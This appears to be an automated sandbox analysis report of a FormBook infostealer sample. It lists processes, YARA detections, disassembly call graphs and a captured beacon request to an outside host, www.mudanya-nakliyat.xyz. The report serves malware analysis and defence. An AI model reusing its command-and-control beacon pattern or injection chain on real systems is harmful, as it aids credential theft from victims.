                                                                                Data Raw: 50 4a 39 4c 3d 74 49 66 77 50 7a 71 65 36 47 52 70 64 51 4c 5a 6a 2f 42 46 75 64 7a 5a 6a 74 65 69 43 58 39 45 79 41 71 66 67 51 41 64 55 52 36 69 44 54 45 6c 59 36 77 67 35 34 47 7a 47 61 76 75 58 50 41 6d 36 79 68 54 51 31 47 77 71 33 73 49 48 4b 64 46 70 38 6f 78 43 47 63 4a 50 63 74 62 47 77 39 37 62 34 48 55 4c 6f 6d 36 33 32 72 4d 67 6b 72 52 53 38 63 35 56 67 6e 79 31 71 53 56 47 75 59 72 47 7a 68 7a 34 36 59 2f 4a 72 69 72 4d 5a 61 47 4e 32 72 50 74 6e 37 33 2b 76 47 48 76 72 6a 39 42 5a 62 53 31 4b 74 38 39 41 59 61 63 75 41 6c 79 67 64 56 7a 63 63 4d 54 78 4d 30 43 39 69 71 38 37 77 46 76 63 6f 30 71 42 71 42 2f 74 44 4d 73 35 55 72 4c 72 35 52 67 66 32 4f 2b 34 7a 77 6a 68 44 39 48 46 59 4c 71 64 74 44 67 74 54 69 46 62 63 4d 2b 6e 6e 77 7a 74 46 41 5a 6d 76 2f 36 41 2b 65 49 4d 48 47 76 56 42 52 59 41 43 52 45 56 61 51 63 48 71 36 4d 43 69 4b 63 50 2f 43 54 48 51 39 4c 4c 46 5a 30 41 4b 68 6a 75 5a 64 49 54 73 65 6c 77 71 6a 71 57 67 33 31 36 4a 30 6c 76 63 46 30 74 66 2f 32 78 36 6c 6f [TRUNCATED]
                                                                                Data Ascii: PJ9L=tIfwPzqe6GRpdQLZj/BFudzZjteiCX9EyAqfgQAdUR6iDTElY6wg54GzGavuXPAm6yhTQ1Gwq3sIHKdFp8oxCGcJPctbGw97b4HULom632rMgkrRS8c5Vgny1qSVGuYrGzhz46Y/JrirMZaGN2rPtn73+vGHvrj9BZbS1Kt89AYacuAlygdVzccMTxM0C9iq87wFvco0qBqB/tDMs5UrLr5Rgf2O+4zwjhD9HFYLqdtDgtTiFbcM+nnwztFAZmv/6A+eIMHGvVBRYACREVaQcHq6MCiKcP/CTHQ9LLFZ0AKhjuZdITselwqjqWg316J0lvcF0tf/2x6lo+ymiYUpGs+VVYsZwSk7Fk7NSvYN0XqeFDMULpZhXYPnToIZ7vQyxgrcrS7ZfBfld9iiT76D2uF7L9eh9EiqNhnCdRT/DpQQZcsEtrUKN1p7jH7TPzNn+DYWWhCWksoioMoxZFbyABiavRF3ikdWtN0ZSfIHl+IkSgfl3ZIhZAYbI6SWb7rukNxuTdJIGfmXpLYLrmaLw1R9KTU63BMzO7Y9tBnKmiVHcOaFNB5EYL9yCNDP7Gk22PKVFxODLSN/FQYQEpqy5soi8j8kgz9McSh/AEh4GXQsyl7huKe9rJWzajEAsRs1ujH1V4kVh0vGNfHGVPP2fo/ROXhOhQ27GwnA1SmEkXsR03oBiCYIpbUyvXZbk2QK08YWkaGoKzM0yjb4WXaIMGAfQDzdySRi4vgl5RuEkINQgADczQmjhkvFRPfWtMhiwxYmjqinOAg/IgLEGwGkVaQ1uTGuVpEtJD8GG0O1ejR/6piN1BqjILC+TE1n8ymceg4hNAiNFSwGW4/RPG3KoxvnjULoJ/o4kxRxC7Y3SnGOsJDVBnzgLIAMS3CUurZS+NtS7OS8eQu1BwV7wZpo7StFhwb5tdYc9NUj216uJGSQwzJBlxUyMwzQcke2N+6BBVeK2wOB4WhsKONzSaCruRQUmGqIhQkwCCOgzeTz0ODSxQN [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.55000485.159.66.9380760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:41:07.925013065 CEST348OUTGET /tkqd/?PJ9L=gK3QMDONvn1ERFi3le5iq9CigfqrIypj3GmKmlk3fya6bSQAZ6Mmquf2H7jJBtRUywZhV3/ctEceSqN2mfA4IjI7ZNYjXHB3esnYbISz5Gf8jiahD8UpXyLU85TiP8RgbQ==&2z=PtRhXbM HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.mudanya-nakliyat.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:08:38:15
                                                                                Start date:10/10/2024
                                                                                Path:C:\Users\user\Desktop\lByv6mqTCJ.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\lByv6mqTCJ.exe"
                                                                                Imagebase:0x410000
                                                                                File size:283'136 bytes
                                                                                MD5 hash:031C70730800588A7B8228F4AB79595E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:08:38:17
                                                                                Start date:10/10/2024
                                                                                Path:C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe"
                                                                                Imagebase:0x4c0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:3
                                                                                Start time:08:38:19
                                                                                Start date:10/10/2024
                                                                                Path:C:\Windows\SysWOW64\grpconv.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\grpconv.exe"
                                                                                Imagebase:0x7e0000
                                                                                File size:40'448 bytes
                                                                                MD5 hash:5A13926732E6D349FD060C072BC7FB74
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:5
                                                                                Start time:08:38:32
                                                                                Start date:10/10/2024
                                                                                Path:C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe"
                                                                                Imagebase:0x4c0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:6
                                                                                Start time:08:38:49
                                                                                Start date:10/10/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.2%
                                                                                  Dynamic/Decrypted Code Coverage:5%
                                                                                  Signature Coverage:13.6%
                                                                                  Total number of Nodes:140
                                                                                  Total number of Limit Nodes:14
                                                                                  execution_graph 95099 4343c3 95100 4343df 95099->95100 95101 434407 95100->95101 95102 43441b 95100->95102 95103 43bfe3 NtClose 95101->95103 95109 43bfe3 95102->95109 95106 434410 95103->95106 95105 434424 95112 43e173 RtlAllocateHeap 95105->95112 95108 43442f 95110 43bffd 95109->95110 95111 43c00b NtClose 95110->95111 95111->95105 95112->95108 95113 4383e3 95114 438448 95113->95114 95115 438483 95114->95115 95118 428513 95114->95118 95117 438465 95120 4284a2 95118->95120 95119 428536 95120->95119 95123 43c383 95120->95123 95122 4284fb 95122->95117 95124 43c39d 95123->95124 95125 43c3ae ExitProcess 95124->95125 95125->95122 95126 423463 95129 43c263 95126->95129 95130 43c280 95129->95130 95133 1852c70 LdrInitializeThunk 95130->95133 95131 423485 95133->95131 95134 411920 95135 411932 95134->95135 95136 41197c 95134->95136 95139 43f6e3 95136->95139 95137 411a25 95137->95137 95142 43dc13 95139->95142 95143 43dc39 95142->95143 95154 417063 95143->95154 95145 43dc4f 95153 43dcab 95145->95153 95157 42aab3 95145->95157 95147 43dc6e 95148 43c383 ExitProcess 95147->95148 95150 43dc83 95147->95150 95148->95150 95168 437cf3 95150->95168 95151 43dc9d 95152 43c383 ExitProcess 95151->95152 95152->95153 95153->95137 95172 425e13 95154->95172 95156 417070 95156->95145 95158 42aadf 95157->95158 95196 42a9a3 95158->95196 95161 42ab24 95164 42ab40 95161->95164 95166 43bfe3 NtClose 95161->95166 95162 42ab0c 95163 42ab17 95162->95163 95165 43bfe3 NtClose 95162->95165 95163->95147 95164->95147 95165->95163 95167 42ab36 95166->95167 95167->95147 95169 437d54 95168->95169 95171 437d61 95169->95171 95207 427fc3 95169->95207 95171->95151 95173 425e30 95172->95173 95175 425e46 95173->95175 95176 43ca13 95173->95176 95175->95156 95178 43ca2d 95176->95178 95177 43ca5c 95177->95175 95178->95177 95183 43b663 95178->95183 95184 43b680 95183->95184 95190 1852c0a 95184->95190 95185 43b6a9 95187 43e053 95185->95187 95193 43c333 95187->95193 95189 43cacf 95189->95175 95191 1852c1f LdrInitializeThunk 95190->95191 95192 1852c11 95190->95192 95191->95185 95192->95185 95194 43c350 95193->95194 95195 43c35e RtlFreeHeap 95194->95195 95195->95189 95197 42a9bd 95196->95197 95201 42aa99 95196->95201 95202 43b703 95197->95202 95200 43bfe3 NtClose 95200->95201 95201->95161 95201->95162 95203 43b71d 95202->95203 95206 18535c0 LdrInitializeThunk 95203->95206 95204 42aa8d 95204->95200 95206->95204 95208 427fe1 95207->95208 95214 4284fb 95208->95214 95215 423643 95208->95215 95210 42811a 95211 43e053 RtlFreeHeap 95210->95211 95210->95214 95212 428132 95211->95212 95213 43c383 ExitProcess 95212->95213 95212->95214 95213->95214 95214->95171 95219 423663 95215->95219 95217 4236c2 95217->95210 95218 4236cc 95218->95210 95219->95218 95220 42adc3 RtlFreeHeap LdrInitializeThunk 95219->95220 95220->95217 95221 4239c3 95222 4239dc 95221->95222 95224 4239fa 95222->95224 95227 427153 95222->95227 95225 423a46 95224->95225 95226 423a33 PostThreadMessageW 95224->95226 95226->95225 95229 427177 95227->95229 95228 42717e 95228->95224 95229->95228 95230 4271b3 LdrLoadDll 95229->95230 95231 4271ca 95229->95231 95230->95231 95231->95224 95232 42aca3 95233 42ace7 95232->95233 95234 42ad08 95233->95234 95235 43bfe3 NtClose 95233->95235 95235->95234 95236 1852b60 LdrInitializeThunk 95237 434753 95238 43476c 95237->95238 95239 4347b4 95238->95239 95242 4347f1 95238->95242 95244 4347f6 95238->95244 95240 43e053 RtlFreeHeap 95239->95240 95241 4347c1 95240->95241 95243 43e053 RtlFreeHeap 95242->95243 95243->95244 95245 43f273 95246 43e053 RtlFreeHeap 95245->95246 95247 43f288 95246->95247 95248 43f213 95249 43f223 95248->95249 95250 43f229 95248->95250 95253 43e133 95250->95253 95252 43f24f 95256 43c2f3 95253->95256 95255 43e14e 95255->95252 95257 43c30d 95256->95257 95258 43c31b RtlAllocateHeap 95257->95258 95258->95255 95259 43b613 95260 43b62d 95259->95260 95263 1852df0 LdrInitializeThunk 95260->95263 95261 43b652 95263->95261 95264 423a5b 95265 4239f7 95264->95265 95266 423a62 95264->95266 95267 423a46 95265->95267 95268 423a33 PostThreadMessageW 95265->95268 95268->95267 95269 428718 95270 43bfe3 NtClose 95269->95270 95271 428722 95270->95271

                                                                                  Executed Functions

                                                                                  Function 00427153 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 94 427153-42717c call 43ed53 97 427182-427190 call 43f353 94->97 98 42717e-427181 94->98 101 427192-42719d call 43f5f3 97->101 102 4271a0-4271b1 call 43d6e3 97->102 101->102 107 4271b3-4271c7 LdrLoadDll 102->107 108 4271ca-4271cd 102->108 107->108
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004271C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: ba07f67e53e0cf5e44d38538f00e0368fd2be6024c43770566bd29dc4f468198
                                                                                  • Instruction ID: c87445d1a6d31742e0aa54b3de4e074540e714893dc508ff31bd8cace8ec02f9
                                                                                  • Opcode Fuzzy Hash: ba07f67e53e0cf5e44d38538f00e0368fd2be6024c43770566bd29dc4f468198
                                                                                  • Instruction Fuzzy Hash: AB0125B5E0020DB7DF10DBE5DC42FAEB7789F54308F0081AAE90897281F675EB188B95
                                                                                  Function 0043BFE3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 114 43bfe3-43c019 call 4144e3 call 43d1f3 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0043C014
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 8ebffa444dc58d3b3492b878dad6112ed5d675857ba907a3f1e3c77e187f82a0
                                                                                  • Instruction ID: e61237b702b6c53ea5f2bfed5c5b1cdd7eb3fb93f35dfe1ccbd750590a7cb668
                                                                                  • Opcode Fuzzy Hash: 8ebffa444dc58d3b3492b878dad6112ed5d675857ba907a3f1e3c77e187f82a0
                                                                                  • Instruction Fuzzy Hash: A4E08C36600204BBC620EE5AEC42F9B776CEFC9714F00811AFA08A7241CA75BA1187F4
                                                                                  Function 01852B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 128 1852b60-1852b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 61c21cf9d93241ed13c890593c41e6d00ab9e8341bb0825d13c5e954b7345909
                                                                                  • Instruction ID: 2887499a2e0809323e15239ce84e21723c4cd282c0534f377eb8ae507bdc9961
                                                                                  • Opcode Fuzzy Hash: 61c21cf9d93241ed13c890593c41e6d00ab9e8341bb0825d13c5e954b7345909
                                                                                  • Instruction Fuzzy Hash: 4D9002A12025000741057158441471A400E97E1302B55C021E6058590DC5258A956226
                                                                                  Function 01852DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 130 1852df0-1852dfc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 43e04ffd4988209ce620d281ba18fb1dc1063e4cd66816fe6cf7cbb8dd072bd9
                                                                                  • Instruction ID: 75168c6075a1908cdb55ccc3240ae4b9c9454cc47f38d0db8a52f0379153c4ea
                                                                                  • Opcode Fuzzy Hash: 43e04ffd4988209ce620d281ba18fb1dc1063e4cd66816fe6cf7cbb8dd072bd9
                                                                                  • Instruction Fuzzy Hash: 9990027120150417D1117158450470B000D97D1342F95C412A5468558DD6568B56A222
                                                                                  Function 01852C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 129 1852c70-1852c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 94b1547f1a78519b9690f9da6aa65110fdabc0fb528e9fa0f423870f2925f8df
                                                                                  • Instruction ID: 4e1e755c374cabaf0794bdfdb1cf70a065c3bbea430924065a876c3a98710ad8
                                                                                  • Opcode Fuzzy Hash: 94b1547f1a78519b9690f9da6aa65110fdabc0fb528e9fa0f423870f2925f8df
                                                                                  • Instruction Fuzzy Hash: 0790027120158806D1107158840474E000997D1302F59C411A9468658DC6958A957222
                                                                                  Function 018535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 3eff9917d9b19e73ee117543d228f78e073cddf200a51d20f37aec8a540976c2
                                                                                  • Instruction ID: 1d2091ef08af217f5abb9d48df9116cc458a6a862778378831fa01db73091989
                                                                                  • Opcode Fuzzy Hash: 3eff9917d9b19e73ee117543d228f78e073cddf200a51d20f37aec8a540976c2
                                                                                  • Instruction Fuzzy Hash: AC90027160560406D1007158451470A100997D1302F65C411A5468568DC7958B5566A3
                                                                                  Function 00427FC3 Relevance: .4, Instructions: 436COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 98cc1a4aaa1d007294fb72ef6e786c3837189bc714d5d0d6a0b851d2173de3c0
                                                                                  • Instruction ID: 6af8995092a194fb43a897aebad93f7e6f3a456515184b825540d31dd96b511d
                                                                                  • Opcode Fuzzy Hash: 98cc1a4aaa1d007294fb72ef6e786c3837189bc714d5d0d6a0b851d2173de3c0
                                                                                  • Instruction Fuzzy Hash: 5AF1E370E0122AAFDF24DF64DC81ABFB778AF48304F5481AEE505A7241DB786A45CF94
                                                                                  Function 00423A5B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 423a5b-423a60 1 423a62-423a69 0->1 2 4239f7-423a31 call 414453 call 434863 0->2 6 423a6b-423a6f 1->6 17 423a53-423a58 2->17 18 423a33-423a44 PostThreadMessageW 2->18 8 423a71-423a76 6->8 9 423a8d-423a93 6->9 8->9 12 423a78-423a7d 8->12 9->6 10 423a95-423a98 9->10 12->9 14 423a7f-423a86 12->14 15 423a88-423a8b 14->15 16 423a99-423a9c 14->16 15->9 15->16 18->17 19 423a46-423a50 18->19 19->17
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(13612MI5K,00000111,00000000,00000000), ref: 00423A40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 13612MI5K$13612MI5K
                                                                                  • API String ID: 1836367815-1335936682
                                                                                  • Opcode ID: fdf434e417fbe60043988234e57d5e3a599129300df841ff16fb30e4e2e3cb89
                                                                                  • Instruction ID: dc5fd1dc5c302d109750ebbe40d509d1f102af1f14d63350a3e4c9ff15c18a35
                                                                                  • Opcode Fuzzy Hash: fdf434e417fbe60043988234e57d5e3a599129300df841ff16fb30e4e2e3cb89
                                                                                  • Instruction Fuzzy Hash: F3117D20E0035439DB315DB45C02FAF3B784B42765F44836FEA549F3D2C76D8A028789
                                                                                  Function 00423974 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 20 423974-423976 21 42398a-423996 20->21 22 423978 20->22 24 4239f0 21->24 25 423998-4239aa 21->25 22->21 26 4239f2-4239f5 call 427153 24->26 27 4239fa-423a31 call 414453 call 434863 24->27 26->27 33 423a53-423a58 27->33 34 423a33-423a44 PostThreadMessageW 27->34 34->33 35 423a46-423a50 34->35 35->33
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 13612MI5K$13612MI5K
                                                                                  • API String ID: 0-1335936682
                                                                                  • Opcode ID: b5516ad609a2f685c48c7c9fd2c17ed2c07cb16dd7d61b1e0a2fcf6074eac822
                                                                                  • Instruction ID: 83cc631cddce9f3a0d8574d70af6782723595fbaedbcffe5cdc9df3f58668dfb
                                                                                  • Opcode Fuzzy Hash: b5516ad609a2f685c48c7c9fd2c17ed2c07cb16dd7d61b1e0a2fcf6074eac822
                                                                                  • Instruction Fuzzy Hash: F011AF31F406243AD7018E50AC42FDF77789F82B58F408246F6156B2C1C6BC8A028BD9
                                                                                  Function 004239BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 36 4239bc-4239d3 37 4239dc-4239f4 call 43eb03 36->37 38 4239d7 call 43e0f3 36->38 41 4239fa-423a31 call 414453 call 434863 37->41 42 4239f5 call 427153 37->42 38->37 47 423a53-423a58 41->47 48 423a33-423a44 PostThreadMessageW 41->48 42->41 48->47 49 423a46-423a50 48->49 49->47
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(13612MI5K,00000111,00000000,00000000), ref: 00423A40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2131460048.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_410000_lByv6mqTCJ.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 13612MI5K$13612MI5K
                                                                                  • API String ID: 1836367815-1335936682
                                                                                  • Opcode ID: 1b59ba19bc98fd09e1859a0daf945b5255d53fa3b032d0e7e9d8fea008fd6e70
                                                                                  • Instruction ID: 6f29e9fcb1051eb43fb893b8a82441e334e7f7b79ae7d1539ffb60f08a208bc6
                                                                                  • Opcode Fuzzy Hash: 1b59ba19bc98fd09e1859a0daf945b5255d53fa3b032d0e7e9d8fea008fd6e70
                                                                                  • Instruction Fuzzy Hash: 6B114831E4025876EB10A6A19C46FDF7B7C9F81B58F10C059FA047B2C0D7BCA70287A5
                                                                                  Function 004239C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
